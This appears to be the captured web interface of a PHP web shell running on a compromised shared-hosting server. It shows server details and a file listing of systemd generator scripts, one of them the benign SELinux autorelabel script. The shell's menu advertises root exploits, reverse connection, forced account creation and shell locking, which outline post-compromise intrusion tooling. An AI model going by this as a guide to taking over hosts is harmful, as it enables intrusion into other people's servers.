Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.147.53.90
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
systemd /
system-generators /
[ HOME SHELL ]
Name
Size
Permission
Action
kdump-dep-generator.sh
537
B
-rwxr-xr-x
nfs-server-generator
66.07
KB
-rwxr-xr-x
rpc-pipefs-generator
37.23
KB
-rwxr-xr-x
selinux-autorelabel-generator....
743
B
-rwxr-xr-x
systemd-cryptsetup-generator
32.86
KB
-rwxr-xr-x
systemd-debug-generator
16.45
KB
-rwxr-xr-x
systemd-fstab-generator
45.1
KB
-rwxr-xr-x
systemd-getty-generator
16.77
KB
-rwxr-xr-x
systemd-gpt-auto-generator
28.86
KB
-rwxr-xr-x
systemd-hibernate-resume-gener...
12.45
KB
-rwxr-xr-x
systemd-rc-local-generator
12.3
KB
-rwxr-xr-x
systemd-system-update-generato...
12.34
KB
-rwxr-xr-x
systemd-sysv-generator
32.89
KB
-rwxr-xr-x
systemd-veritysetup-generator
20.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : selinux-autorelabel-generator.sh
#!/bin/sh # This systemd.generator(7) detects if SELinux is running and if the # user requested an autorelabel, and if so sets the default target to # selinux-autorelabel.target, which will cause the filesystem to be # relabelled and then the system will reboot again and boot into the # real default target. PATH=/usr/sbin:$PATH unitdir=/usr/lib/systemd/system # If invoked with no arguments (for testing) write to /tmp. earlydir="/tmp" if [ -n "$2" ]; then earlydir="$2" fi set_target () { ln -sf "$unitdir/selinux-autorelabel.target" "$earlydir/default.target" } if selinuxenabled; then if test -f /.autorelabel; then set_target elif grep -sqE "\bautorelabel\b" /proc/cmdline; then set_target fi fi
Close